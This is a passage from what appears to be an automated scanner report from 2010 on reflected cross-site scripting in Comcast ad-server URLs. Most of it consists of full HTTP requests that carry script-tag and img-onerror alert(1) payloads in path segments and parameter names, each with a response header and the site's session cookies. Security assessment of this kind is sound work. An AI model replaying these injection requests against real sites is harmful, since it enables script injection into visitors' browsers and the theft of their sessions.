GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16f84a0"><script>alert(1)</script>ca5da6eb0ab/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 645 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a82"><img%20src%3da%20onerror%3dalert(1)>ac347692986 was submitted in the REST URL parameter 8. This input was echoed as d3a82"><img src=a onerror=alert(1)>ac347692986 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37d3a82"><img%20src%3da%20onerror%3dalert(1)>ac347692986/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 647 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
2.90. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e1da"><script>alert(1)</script>7f1b0dd1ebc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?5e1da"><script>alert(1)</script>7f1b0dd1ebc=1 HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:37 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 646 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525df"><script>alert(1)</script>294ed56285c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/comcast.net525df"><script>alert(1)</script>294ed56285c/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 643 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590c0"><script>alert(1)</script>dcd9f109404 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/comcast.net/home590c0"><script>alert(1)</script>dcd9f109404/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 644 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab9d"><script>alert(1)</script>2fc6280efcb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L167ab9d"><script>alert(1)</script>2fc6280efcb/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 646 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d34"><img%20src%3da%20onerror%3dalert(1)>15c94468647 was submitted in the REST URL parameter 8. This input was echoed as 85d34"><img src=a onerror=alert(1)>15c94468647 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x3785d34"><img%20src%3da%20onerror%3dalert(1)>15c94468647/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:40 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 647 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
2.95. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803ac"><script>alert(1)</script>0d9d2df3c86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?803ac"><script>alert(1)</script>0d9d2df3c86=1 HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 646 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5455c"><script>alert(1)</script>6a987d872c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net5455c"><script>alert(1)</script>6a987d872c7/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 779 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc0c"><script>alert(1)</script>42084a2b583 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp1dc0c"><script>alert(1)</script>42084a2b583/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 780 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126b9"><script>alert(1)</script>0c7d718d7cb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852126b9"><script>alert(1)</script>0c7d718d7cb/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 780 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831fb"><script>alert(1)</script>848b3831af8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35831fb"><script>alert(1)</script>848b3831af8/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 781 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e696a"><img%20src%3da%20onerror%3dalert(1)>850fbda351d was submitted in the REST URL parameter 9. This input was echoed as e696a"><img src=a onerror=alert(1)>850fbda351d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32e696a"><img%20src%3da%20onerror%3dalert(1)>850fbda351d/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 782 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
2.101. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3bc2"><script>alert(1)</script>e45d8e81862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?a3bc2"><script>alert(1)</script>e45d8e81862=1 HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:08:40 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 782 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48f11"><script>alert(1)</script>19550cf6058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net48f11"><script>alert(1)</script>19550cf6058/com-hp/2022363852/L35/594879973/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1 Host: oascentral.comcast.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; 